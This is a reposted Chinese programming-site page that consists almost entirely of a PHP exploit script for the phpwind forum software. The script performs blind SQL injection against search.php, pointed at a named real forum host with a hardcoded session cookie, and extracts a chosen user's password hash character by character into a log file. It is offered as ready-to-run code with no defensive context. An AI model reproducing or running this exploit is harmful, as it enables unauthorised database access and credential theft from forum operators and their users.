欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

从网上搜到的phpwind 0day的代码

程序员文章站 2022-04-02 14:18:13

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312">
<title>codz by 剑心</title>
<style type="text/css">
body,td {
font-family: "tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "tahoma";
font-size: "11px";
}
.input {
font-size: "12px";
color: "#000000";
background-color: "#ffffff";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
color: "#a60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {background-color: "#cccccc"}
.firstalt {background-color: "#efefef"}
.secondalt {background-color: "#f5f5f5"}
</style>
<center>the exploiet of the all phpwind version</center>
<center> by 剑心</center>
<br>
<br>
<br>
<br>
<br>

<?php
ini_set("max_execution_time",0);
error_reporting(7);

$path="/search.php";
$server='bbs.ccidnet.com';
$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%b1%b1%be%a9%ca%d0%b7%bd%d5%fd%bf%ed%b4%f8%0d; lastvisit=0%091161077981%09%2fsearch.php%3f; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; phpsessid=3b11a9ca33071f0b06c9aab0995918a7; cknum=bljquwzsvgtxaz9sbfeawgtdu1nxuanswaefdfnqvvydua1qb1ttuqahvae%3d';


$useragent="mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; .net clr 2.0.50727; .net clr 1.1.4322)";

$uid=2;
$_get['uid']&&$uid=$_get['uid'];
$tid=539264;

$mask='没有查找匹配的内容';
$count=0;

//$testing=1;
//$testing=$_get['test'];
if($testing) {preg_match('/x-powered-by: php\/(.+)\r\n/ie',send(""),$php);echo$php[1];die();}

//$debug=1;


$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
$response=send($cmd);

preg_match('/from (.+)threads/ie',$response,$match);

$pre=$match[1];
if ($match[1]) echo 'good job!wo got the pre: <font color=red>'.$match[1]."</font><br>";
else if (strpos($response,'value="登 录"')) die("you are not login!try to get anthor cookie and useragen value!<br>");
else {echo "maybe it is not vul!<br>";die();}

echo "try to get the uid=$uid 's password:<font color=red>";
$log=fopen('log.txt','a+');


for($i=0;$i<16;$i++)
{

$type=0;
$sub=$i+9;
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=0;
for($m=48;$m<=57;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
$sql=urlencode($sql);
$temp=md5(rand(1,10000)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=1;
for($m=97;$m<=122;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {
echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

echo "error!<br>";
die("shit!may be the data you post is not valid!try anthor uid\r\n");


}
fclose($log);
echo "<br>done!we post $count times!<br>";


function send($cmd)
{
global $path,$server,$cookie,$count,$useragent,$debug;

$count=$count+1;
$message = "post ".$path."? http/1.1\r\n";
$message .= "accept: */*\r\n";
$message .= "accept-language: zh-cn\r\n";
$message .= "referer: http://".$server.$path."\r\n";
$message .= "content-type: application/x-www-form-urlencoded\r\n";
$message .= "user-agent: ".$useragent."\r\n";
$message .= "host: ".$server."\r\n";
$message .= "content-length: ".strlen($cmd)."\r\n";
$message .= "connection: keep-alive\r\n";
$message .= "cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";

$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>